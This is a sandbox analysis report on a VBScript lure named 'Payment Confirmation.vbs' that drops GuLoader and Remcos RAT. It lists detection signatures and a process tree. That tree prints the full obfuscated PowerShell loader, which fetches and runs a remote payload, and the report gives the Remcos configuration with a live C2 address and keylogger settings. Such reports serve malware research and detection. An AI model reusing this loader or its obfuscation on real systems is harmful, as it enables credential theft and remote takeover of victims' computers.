Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Confirmation.vbs

Overview

General Information

Sample name:Payment Confirmation.vbs
Analysis ID:1465864
MD5:f72a6162ebf2a0efc89edbbff12cf158
SHA1:89d7535775bac5a07d9ae7e76e9b397541c0265b
SHA256:12c916ad80fea271f8d47a0277ce8a8c2090c428adcf2ec538f9f6b6e6d91aea
Tags:GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7708 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSoterioeVirrerusEqui,on) Rigdom ');Catholicate (Mashlin 'telefon$Uncomf gSpoofislHalvfjeosideshabSabiania Soci,llDiverto:Deth,onUGenoplinLivsbeteS.ongilxL,vsfarpDoyzarrlForstuvoHanernesP,ykiatiChar.ervE.ternaeCookedmlm,rdentyF.sions=Residen$ CentraU Brud,un.eshadoc D.wfallUnianguiAlpinisp Grabekp Somm,re,rogenerOmdigtn.Fa vetasVentrikp.obakshlA,veolaiCrojikst Konsta( Brasek$UnderbeGPaaseteeSynapsis.lkenslj ,elegof ChifrytInfraociGen.ancg TribunsUnfussitDiv,rsiesmertinsTypo.ra)Snrlive ');Catholicate (Mashlin 'Blok,lj[Klis erNSnapsefeTapp.mat Reetab.BasiskoS,ormindeExtoll,rKaprifov SstersielektrochomoeopeU prompPpseu,opoPersonaiNonlogin Prema tslippetMStravaia ArbejdnBefriela OrenesgDimercueTyfonsmrBikukul]Estrago:Kanonfo:NavneliSSolkre.eE,travecAgamospuTildragrKortadri Nu,erit TacklyyspriggaPB ikettrChironooDelkoratskae,tgoHistoricMiljre oEcoddamlDispers Landstn=Charpie Loranst[ NewsbeNEnchyleeKurchattRrggent.Balla eSCyanaceeBevidnec dongo uPaperinr .edasci Ac.tyltGiftek,yR,troreP RaymunrElmaal.oAbandontHypnoloo OverarcUtri ulohjernehlMarkedsTIspellcyMonsoonpBali,tieDefendr]Subthri:Syldste:AficionTE captilMurg onsoverhea1 yrefab2Bangalo ');$Unclipper=$Unexplosively[0];$Flourishingly= (Mashlin ' Materi$Kaskadeg odsinlSjl,helo ftersobGun,tigaLonersolSynch,o:SerpentMPu,likueNdringslbarryggoBortratdSpgelsei,induessFejludseReshipm=UomgngeNKoaguleeS.ecifiwLegater-CocoforOUrligtcbReseratjSciaenie bolledcKnobstitOdor.nt TromlebS Aperieyout,abbsAdvantatRyatp,eeLamellamPreexpe. MiddelNn ntheieperistot Shrubl.BundfryWUnobstreNon iscbbrahmanCRegentelMora.doiVlverneeKollagenAnteda,t');$Flourishingly+=$hastigheder[1];Catholicate ($Flourishingly);Catholicate (Mashlin 'lim alk$AfgrdenMSuperpreboolskelhu,rsygo,bessindGringeriZebuernsRis ersetwanaer.IndesneHHundr,de ikseanasubtrakd,aspiste Bi,ephrNonrespsAirplan[Dansemu$KabellgSTolkereeFor undnSkotjsfs.retaniaA.lurintVulcanaiParakeeoCoscetbnUrukueneEphemerrLukewa,]Sp,radi=Magnhi.$chill mSOvercuri Macrurk Reconvh SammeneSkakt kn rigs,ms Noneli ');$Samleskinner=Mashlin 'Myrtilu$AutobioMDe.elopeUdarmerl Anato.o ParlamdtriglyciU,loadusKienanueN.veauo.IndvandDUncoloroSkovbruwindholdnPneuma,lUpthr woOvergana Cotu.adPatientFObje.tiiIfeck.fl Datasee Agency(percept$SidelinUB.learinNicholacPachydelTopiskei rimesypDelftwapErstatneOuteatcrpreflig,C mpute$WilhelmRBarounieRivet ep Brode.rBronchooRielnitd,eallnsuAr,uatecV ldfrte Pe iodr OpmagaeGodtgrerDumbbel)Frerpr ';$Reproducerer=$hastigheder[0];Catholicate (Mashlin 'Santali$TuristagUfologilKlirredoIrretenbRekl,meaGra.erelHotdogg:Velvr sTtrisporhSuddennuIsraelinSmudsbldSolstikrFornyeloParilicuK empess Diaram=Overskr(Komitm TmenusekeFuturabsUnc.mbit Underl-Unf,ozeP Uneffea PhenmitBacktenhUffobru Kar ntn$DrpladeRUsympatePhotomap UnaggrrEna.rigo Reta,ed.iskrimuUtilgngcU,lessue grub.rrKlantereDecayabrS.perim)Mongrel ');while (!$Thundrous) {Catholicate (Mashlin 'Testuds$VilladsgReusserlPar.hypotruantlb DyscraaEfters.lMolenss: FonetiHAustempvCarbarniStted.mdUhygge gToryweeuExitenslMaltrakdBrdekor=Subramo$Ba sangt FikserrNitrateuTalstrkeUnsalva ') ;Catholicate $Samleskinner;Catholicate (Mashlin 'Sto,medSMannosetHaggishaselvflgrHalvpunt Halvto- TilsatSEftestulHje,meleGingerseHeaviespDowerov Luf.hav4Suspect ');Catholicate (Mashlin 'Mo erig$ruberytgUnsavo,l TodkkeoKlunketbP,egrataPippinslTaphane:LithifiTHovedsthFracturuRepri inDays ard BanalirEncycloosyndikauD.rmitisCardais=Flgende(CarnifeTGrandmaeBonbonnsIsogenetTartele-SuccessP alkyriagaa,dejtBulderkhkirking Beguin$Stafe,lREva,oraeStylistpFyresedr arvieaoGastrondE cultuu outcooc sta.ieelehrsmerSkydiveeDiatr pr inolog)Pailowi ') ;Catholicate (Mashlin 'Luftfor$Uptossig Landm lResea,eoFri andbNnsomtgaSurinaml Fjorte:BegivenDPeonageaKlapp,rtFandangcPr,ssiohRes nif=Success$BilinspgDiscut,lKlvere obenc.rebUnderreaKollektl.ormatl:PreimprTRelenteaStantonxUnshameiUngiddyeM rgenlsKl,erru+Miss ur+For.nnv%,apseri$t.rfagsU Sph,ngnAmphisieScolecixJuniorcpU,sortel ykningo anters ReprseiTarnfrhvResidu,eKvind,kl SlimsiyI entif.Couldesc S.acelo Spec ru.ankrolnSa chartSqueezi ') ;$Unclipper=$Unexplosively[$Datch];}$Cafeterieejerne=335771;$Unoccupiedness111=31688;Catholicate (Mashlin 'Greenbo$VideobagMotionsl SoutheopeucitebDialyseaUn.entllHyposta: HomeozDCwtdisrrMglerviaForhaangAffabileFlambeenAfsvedn Kassati=fe ered Retra.sGDiagonaeVanquist Lemmed-ByggesaCPaladseoChaffennBrnefamt Chimerepred.can.eteraktLsehove Skuespi$D.legerRdue ighe ildmanp.fsyrinrAggressoKonfek,dBonbonnu VirilicJ mfruheMecca.br Triumfe AtomisrAmtsraa ');Catholicate (Mashlin 'Hvidsyn$.legnerg Graphol HviledomakrorebUnapp.oaNightc.lRetouch:GennemgER,covera MousinrPhosphotParkinchDisgenisArchiluhMephistiBashingnpreplanePulples Kinkier=Ultramo Teksth[ .halciSKnyttelyRe.oketsGismondtNoelle,eLom espmDess.rt.L ndbruCOmkldnioTalahibn OverspvReorganeRokerinrLegiohat Overby]Puinavi:Decimal:SelectlFNeap,lir fascisoC.mputemGensi iBSammenba eaconsUn.ialbekbspris6 ibatio4tr,lleySUnanimotAalbindrPeltingiGenindkn ges usgBolig.a(Samle,g$Tev ndsDAk.ieavr SurrogaForurengPiaristeSonedeun Connoi) Plasti ');Catholicate (Mashlin 'Nonexec$FadsecogBagsidelS,ymikroB.fjersbSensizeacountywlBrnewor:,rdifasTUnderdih.chateteDeciderttaengeraTestostrSkabertyCardio tBanalismAmativeeForargb Prisstt= Pierce Acryld[PropendS nfacetyskvisnis,carpertResqu.nepa.hetimHi chhi.UdsigtsTMastu,beTripterx ,obilitAmmoc e.Lurer eENrbill nBryskesc Macedoo HerhendDrbtfariUdenomrn Irett gChie.er]Unev.ng:Almisse:OverreaAFort edSjurisdiCRug ginISplitteI,iskuss.UndersaGZooph,te Pe tlytDrni.geSOplandstUnr,vearTraileri ThallonFrserengKollegi( Invent$FramegrEBjlkeh aNiftilyrAlmengrtunstitchSonicats Lyssuvh M lakiiSettimon Licentecoupals)Bullnec ');Catholicate (Mashlin ' S rlig$Mycel ugSucceedldysmerooSemispeb Su picaJosherpl Risq e:N,nguarDDukked aFredninmSiccantpLavemens U.obsekfellaspi.tigmatbDistribsstavelsfChris,io Ud.etarMind tebGramsciiSamlebanGengldtd M.litreLysbil,lFedtsyrs BadutseAgertidrKollektsAgonied=Bubonoc$AkademiTDocentshStudieeeUn hoosta.sishua l,crinrKmperesy S,ineptHusmandmLob teue ermes. GenavnsMes,speu CosmopbSkarpsks Fo niktMarriagr SocialiLaundscnKonsu agSjklera(Beautsi$AftaletCLangluvaVituperf U.paraeMetaportOutsouneRme.glarTeatedbiPuzzledeElectr eCaracoljDebaseseP.stattrOverr snGouverneKizbetj, atakop$ GustavUAfvandrnHavfiskoStu,percElectric Havehuu,ucranepBrdfabriUnem,nceDatidigd Basilin anvis.eBataljes BlazonsObstina1pomegra1kjeldfi1Hypsoph)Forsvrg ');Catholicate $Dampskibsforbindelsers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7980 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8080 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSoterioeVirrerusEqui,on) Rigdom ');Catholicate (Mashlin 'telefon$Uncomf gSpoofislHalvfjeosideshabSabiania Soci,llDiverto:Deth,onUGenoplinLivsbeteS.ongilxL,vsfarpDoyzarrlForstuvoHanernesP,ykiatiChar.ervE.ternaeCookedmlm,rdentyF.sions=Residen$ CentraU Brud,un.eshadoc D.wfallUnianguiAlpinisp Grabekp Somm,re,rogenerOmdigtn.Fa vetasVentrikp.obakshlA,veolaiCrojikst Konsta( Brasek$UnderbeGPaaseteeSynapsis.lkenslj ,elegof ChifrytInfraociGen.ancg TribunsUnfussitDiv,rsiesmertinsTypo.ra)Snrlive ');Catholicate (Mashlin 'Blok,lj[Klis erNSnapsefeTapp.mat Reetab.BasiskoS,ormindeExtoll,rKaprifov SstersielektrochomoeopeU prompPpseu,opoPersonaiNonlogin Prema tslippetMStravaia ArbejdnBefriela OrenesgDimercueTyfonsmrBikukul]Estrago:Kanonfo:NavneliSSolkre.eE,travecAgamospuTildragrKortadri Nu,erit TacklyyspriggaPB ikettrChironooDelkoratskae,tgoHistoricMiljre oEcoddamlDispers Landstn=Charpie Loranst[ NewsbeNEnchyleeKurchattRrggent.Balla eSCyanaceeBevidnec dongo uPaperinr .edasci Ac.tyltGiftek,yR,troreP RaymunrElmaal.oAbandontHypnoloo OverarcUtri ulohjernehlMarkedsTIspellcyMonsoonpBali,tieDefendr]Subthri:Syldste:AficionTE captilMurg onsoverhea1 yrefab2Bangalo ');$Unclipper=$Unexplosively[0];$Flourishingly= (Mashlin ' Materi$Kaskadeg odsinlSjl,helo ftersobGun,tigaLonersolSynch,o:SerpentMPu,likueNdringslbarryggoBortratdSpgelsei,induessFejludseReshipm=UomgngeNKoaguleeS.ecifiwLegater-CocoforOUrligtcbReseratjSciaenie bolledcKnobstitOdor.nt TromlebS Aperieyout,abbsAdvantatRyatp,eeLamellamPreexpe. MiddelNn ntheieperistot Shrubl.BundfryWUnobstreNon iscbbrahmanCRegentelMora.doiVlverneeKollagenAnteda,t');$Flourishingly+=$hastigheder[1];Catholicate ($Flourishingly);Catholicate (Mashlin 'lim alk$AfgrdenMSuperpreboolskelhu,rsygo,bessindGringeriZebuernsRis ersetwanaer.IndesneHHundr,de ikseanasubtrakd,aspiste Bi,ephrNonrespsAirplan[Dansemu$KabellgSTolkereeFor undnSkotjsfs.retaniaA.lurintVulcanaiParakeeoCoscetbnUrukueneEphemerrLukewa,]Sp,radi=Magnhi.$chill mSOvercuri Macrurk Reconvh SammeneSkakt kn rigs,ms Noneli ');$Samleskinner=Mashlin 'Myrtilu$AutobioMDe.elopeUdarmerl Anato.o ParlamdtriglyciU,loadusKienanueN.veauo.IndvandDUncoloroSkovbruwindholdnPneuma,lUpthr woOvergana Cotu.adPatientFObje.tiiIfeck.fl Datasee Agency(percept$SidelinUB.learinNicholacPachydelTopiskei rimesypDelftwapErstatneOuteatcrpreflig,C mpute$WilhelmRBarounieRivet ep Brode.rBronchooRielnitd,eallnsuAr,uatecV ldfrte Pe iodr OpmagaeGodtgrerDumbbel)Frerpr ';$Reproducerer=$hastigheder[0];Catholicate (Mashlin 'Santali$TuristagUfologilKlirredoIrretenbRekl,meaGra.erelHotdogg:Velvr sTtrisporhSuddennuIsraelinSmudsbldSolstikrFornyeloParilicuK empess Diaram=Overskr(Komitm TmenusekeFuturabsUnc.mbit Underl-Unf,ozeP Uneffea PhenmitBacktenhUffobru Kar ntn$DrpladeRUsympatePhotomap UnaggrrEna.rigo Reta,ed.iskrimuUtilgngcU,lessue grub.rrKlantereDecayabrS.perim)Mongrel ');while (!$Thundrous) {Catholicate (Mashlin 'Testuds$VilladsgReusserlPar.hypotruantlb DyscraaEfters.lMolenss: FonetiHAustempvCarbarniStted.mdUhygge gToryweeuExitenslMaltrakdBrdekor=Subramo$Ba sangt FikserrNitrateuTalstrkeUnsalva ') ;Catholicate $Samleskinner;Catholicate (Mashlin 'Sto,medSMannosetHaggishaselvflgrHalvpunt Halvto- TilsatSEftestulHje,meleGingerseHeaviespDowerov Luf.hav4Suspect ');Catholicate (Mashlin 'Mo erig$ruberytgUnsavo,l TodkkeoKlunketbP,egrataPippinslTaphane:LithifiTHovedsthFracturuRepri inDays ard BanalirEncycloosyndikauD.rmitisCardais=Flgende(CarnifeTGrandmaeBonbonnsIsogenetTartele-SuccessP alkyriagaa,dejtBulderkhkirking Beguin$Stafe,lREva,oraeStylistpFyresedr arvieaoGastrondE cultuu outcooc sta.ieelehrsmerSkydiveeDiatr pr inolog)Pailowi ') ;Catholicate (Mashlin 'Luftfor$Uptossig Landm lResea,eoFri andbNnsomtgaSurinaml Fjorte:BegivenDPeonageaKlapp,rtFandangcPr,ssiohRes nif=Success$BilinspgDiscut,lKlvere obenc.rebUnderreaKollektl.ormatl:PreimprTRelenteaStantonxUnshameiUngiddyeM rgenlsKl,erru+Miss ur+For.nnv%,apseri$t.rfagsU Sph,ngnAmphisieScolecixJuniorcpU,sortel ykningo anters ReprseiTarnfrhvResidu,eKvind,kl SlimsiyI entif.Couldesc S.acelo Spec ru.ankrolnSa chartSqueezi ') ;$Unclipper=$Unexplosively[$Datch];}$Cafeterieejerne=335771;$Unoccupiedness111=31688;Catholicate (Mashlin 'Greenbo$VideobagMotionsl SoutheopeucitebDialyseaUn.entllHyposta: HomeozDCwtdisrrMglerviaForhaangAffabileFlambeenAfsvedn Kassati=fe ered Retra.sGDiagonaeVanquist Lemmed-ByggesaCPaladseoChaffennBrnefamt Chimerepred.can.eteraktLsehove Skuespi$D.legerRdue ighe ildmanp.fsyrinrAggressoKonfek,dBonbonnu VirilicJ mfruheMecca.br Triumfe AtomisrAmtsraa ');Catholicate (Mashlin 'Hvidsyn$.legnerg Graphol HviledomakrorebUnapp.oaNightc.lRetouch:GennemgER,covera MousinrPhosphotParkinchDisgenisArchiluhMephistiBashingnpreplanePulples Kinkier=Ultramo Teksth[ .halciSKnyttelyRe.oketsGismondtNoelle,eLom espmDess.rt.L ndbruCOmkldnioTalahibn OverspvReorganeRokerinrLegiohat Overby]Puinavi:Decimal:SelectlFNeap,lir fascisoC.mputemGensi iBSammenba eaconsUn.ialbekbspris6 ibatio4tr,lleySUnanimotAalbindrPeltingiGenindkn ges usgBolig.a(Samle,g$Tev ndsDAk.ieavr SurrogaForurengPiaristeSonedeun Connoi) Plasti ');Catholicate (Mashlin 'Nonexec$FadsecogBagsidelS,ymikroB.fjersbSensizeacountywlBrnewor:,rdifasTUnderdih.chateteDeciderttaengeraTestostrSkabertyCardio tBanalismAmativeeForargb Prisstt= Pierce Acryld[PropendS nfacetyskvisnis,carpertResqu.nepa.hetimHi chhi.UdsigtsTMastu,beTripterx ,obilitAmmoc e.Lurer eENrbill nBryskesc Macedoo HerhendDrbtfariUdenomrn Irett gChie.er]Unev.ng:Almisse:OverreaAFort edSjurisdiCRug ginISplitteI,iskuss.UndersaGZooph,te Pe tlytDrni.geSOplandstUnr,vearTraileri ThallonFrserengKollegi( Invent$FramegrEBjlkeh aNiftilyrAlmengrtunstitchSonicats Lyssuvh M lakiiSettimon Licentecoupals)Bullnec ');Catholicate (Mashlin ' S rlig$Mycel ugSucceedldysmerooSemispeb Su picaJosherpl Risq e:N,nguarDDukked aFredninmSiccantpLavemens U.obsekfellaspi.tigmatbDistribsstavelsfChris,io Ud.etarMind tebGramsciiSamlebanGengldtd M.litreLysbil,lFedtsyrs BadutseAgertidrKollektsAgonied=Bubonoc$AkademiTDocentshStudieeeUn hoosta.sishua l,crinrKmperesy S,ineptHusmandmLob teue ermes. GenavnsMes,speu CosmopbSkarpsks Fo niktMarriagr SocialiLaundscnKonsu agSjklera(Beautsi$AftaletCLangluvaVituperf U.paraeMetaportOutsouneRme.glarTeatedbiPuzzledeElectr eCaracoljDebaseseP.stattrOverr snGouverneKizbetj, atakop$ GustavUAfvandrnHavfiskoStu,percElectric Havehuu,ucranepBrdfabriUnem,nceDatidigd Basilin anvis.eBataljes BlazonsObstina1pomegra1kjeldfi1Hypsoph)Forsvrg ');Catholicate $Dampskibsforbindelsers;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8168 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7712 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7900 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 756 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "103.237.87.161:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KECL2I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
